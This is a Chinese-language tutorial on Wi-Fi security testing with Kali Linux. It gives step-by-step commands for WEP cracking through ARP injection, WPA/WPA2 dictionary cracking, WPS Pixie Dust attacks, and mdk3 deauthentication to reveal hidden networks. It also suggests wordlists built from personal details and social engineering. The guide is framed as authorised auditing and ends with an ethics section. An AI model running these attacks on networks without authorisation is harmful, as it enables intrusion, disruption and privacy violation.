Kali Linux实战指南:无线网络安全测试全流程解析

一、测试环境搭建与基础准备

1.1 系统环境要求

开展无线网络安全测试需满足以下硬件条件:支持监听模式的无线网卡(推荐采用Atheros或Realtek芯片的USB网卡)、至少4GB内存的测试主机。软件层面需使用最新版Kali Linux系统,该系统已预装aircrack-ng、reaver等核心测试工具。

1.2 终端环境配置

通过SSH或本地终端登录系统后,建议执行以下初始化操作:

  1. # 更新软件包索引
  2. sudo apt update
  3. # 安装缺失依赖(如未预装)
  4. sudo apt install -y aircrack-ng wireshark reaver
  5. # 创建专用测试目录
  6. mkdir ~/wireless_audit && cd ~/wireless_audit

二、无线网卡监听模式激活

2.1 网卡状态确认

执行ip a命令查看网络接口,重点关注wlan0等无线接口。若系统未识别网卡,需通过lsusb确认设备是否被系统识别,并检查内核模块加载情况:

  1. lsmod | grep ath # 针对Atheros芯片
  2. lsmod | grep rtl # 针对Realtek芯片

2.2 进程冲突处理

关闭可能干扰监听的守护进程:

  1. sudo airmon-ng check kill
  2. # 验证关键进程是否终止
  3. ps aux | grep -E 'NetworkManager|wpa_supplicant'

2.3 模式转换操作

执行监听模式转换命令时需注意:

  1. # 标准转换命令
  2. sudo airmon-ng start wlan0
  3. # 特殊情况处理(如驱动兼容问题)
  4. sudo modprobe -r ath9k && sudo modprobe ath9k
  5. sudo airmon-ng start wlan0

转换成功后,新接口名称会添加mon后缀(如wlan0mon)。通过iwconfig验证模式显示应为Monitor,频率范围应覆盖2.4GHz/5GHz频段。

三、无线网络信息收集

3.1 基础扫描技术

使用airodump-ng进行被动扫描:

  1. sudo airodump-ng wlan0mon

关键输出字段解析:

  • BSSID:路由器MAC地址(前3字节为厂商OUI)
  • CH:工作信道(需记录用于定向扫描)
  • ENC:加密类型(WEP/WPA/WPA2/WPA3)
  • CIPHER:加密套件(CCMP/TKIP)
  • AUTH:认证方式(PSK/802.1X)

3.2 定向扫描优化

针对特定网络进行深度扫描:

  1. sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF --channel 6 --write target_scan wlan0mon

该操作会生成包含握手包的.cap文件,为后续密码破解提供数据基础。建议扫描时长不少于10分钟以捕获完整握手过程。

3.3 隐藏网络探测

对于未广播SSID的网络,可采用以下方法:

  1. 通过信道扫描发现异常信号强度波动
  2. 使用wash工具检测WPS功能开启的网络
  3. 结合mdk3工具进行DoS攻击诱导客户端暴露SSID

四、漏洞验证与利用

4.1 WEP加密破解

针对WEP加密网络的典型攻击流程:

  1. # 捕获IV数据包
  2. sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF --channel 6 --ivs -w wep_capture wlan0mon
  3. # 发起ARP注入攻击
  4. sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF wlan0mon
  5. # 破解密钥
  6. sudo aircrack-ng wep_capture-01.ivs

破解成功率与捕获数据包数量成正比,建议至少收集10,000个IV包。

4.2 WPA/WPA2破解

针对PSK认证的破解方法:

  1. # 分离握手包
  2. sudo aircrack-ng target_scan-01.cap
  3. # 字典攻击示例
  4. sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt target_scan-01.cap

提升破解效率的建议:

  • 使用GPU加速工具(如hashcat)
  • 定制针对性字典(包含生日、手机号等个人信息)
  • 实施社会工程学获取密码线索

4.3 WPS漏洞利用

针对WPS功能开启的路由器:

  1. # 检测WPS状态
  2. sudo wash -i wlan0mon
  3. # 执行Pixie Dust攻击
  4. sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -K 1 -vv

该攻击可在数分钟内获取PSK密码,但需注意部分厂商已修复此漏洞。

五、测试结果分析与报告

5.1 数据包分析技巧

使用Wireshark进行深度分析:

  1. 过滤802.11管理帧(wlan.fc.type_subtype == 0x08)
  2. 分析EAPOL握手过程(eapol过滤)
  3. 检测异常重传帧(duplicate frame标识)

5.2 漏洞评级标准

参照CVSS评分体系进行风险评估:
| 漏洞类型 | 严重程度 | 利用难度 | 影响范围 |
|————————|—————|—————|—————|
| WEP加密 | 严重 | 低 | 网络全部 |
| WPS漏洞 | 高危 | 中 | 管理界面 |
| 弱密码 | 中危 | 取决于密码复杂度 | 认证系统 |

5.3 报告撰写规范

完整测试报告应包含:

  1. 测试范围与方法论说明
  2. 发现的漏洞清单(含CVE编号)
  3. 攻击路径示意图
  4. 修复建议(如升级固件、禁用WPS等)
  5. 风险评估矩阵

六、安全测试伦理规范

进行无线网络安全测试必须遵循:

  1. 获得书面授权(测试范围、时间窗口明确)
  2. 限制测试强度(避免造成服务中断)
  3. 保护捕获数据(加密存储,及时删除)
  4. 遵守《网络安全法》等相关法规

建议在实际测试前搭建模拟环境进行技能验证,可使用虚拟机创建多个虚拟AP进行攻击演练。测试完成后务必执行sudo airmon-ng stop wlan0mon恢复网卡正常模式,避免影响网络使用。